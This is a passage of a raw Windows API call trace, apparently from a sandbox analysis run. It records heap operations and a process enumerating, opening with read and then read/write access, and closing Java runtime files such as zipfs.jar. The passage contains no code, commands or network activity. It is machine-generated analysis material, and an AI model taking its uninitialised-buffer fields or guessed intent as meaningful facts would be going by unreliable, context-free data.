dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0096.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.516] AreFileApisANSI () returned 1 [0096.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar", lpUsedDefaultChar=0x0) returned 53 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0096.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.517] AreFileApisANSI () returned 1 [0096.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0096.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 53 [0096.517] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.517] GetFileType (hFile=0x418) returned 0x1 [0096.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0096.517] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.517] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.517] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.518] CloseHandle (hObject=0x418) returned 1 [0096.518] AreFileApisANSI () returned 1 [0096.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0096.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 53 [0096.518] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.518] GetFileType (hFile=0x418) returned 0x1 [0096.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0096.518] CloseHandle (hObject=0x418) returned 1 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.519] AreFileApisANSI () returned 1 [0096.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0096.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0096.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar") returned 53 [0096.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\zipfs.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\zipfs.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c)) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.520] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x68, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a3b8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x68, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\e", cAlternateFileName="渘Ĉ㪀ā湈Ĉ഼̓\x01⺊Āgr먤聤̓㑍Ā̓芐\x07̓뻌聤഼\x01഼\x01.8.0_144\\lib\\ext\\zipfs.jar")) returned 0 [0096.520] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0096.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0096.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0096.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0096.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.521] AreFileApisANSI () returned 1 [0096.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties", lpUsedDefaultChar=0x0) returned 60 [0096.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.521] AreFileApisANSI () returned 1 [0096.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0096.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69e30 [0096.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 60 [0096.521] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.522] GetFileType (hFile=0x360) returned 0x1 [0096.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0096.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.522] CloseHandle (hObject=0x360) returned 1 [0096.522] AreFileApisANSI () returned 1 [0096.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0096.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0096.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 60 [0096.523] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.523] GetFileType (hFile=0x360) returned 0x1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0096.523] CloseHandle (hObject=0x360) returned 1 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.524] AreFileApisANSI () returned 1 [0096.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0096.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0096.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties") returned 60 [0096.524] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\flavormap.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\flavormap.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58)) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: 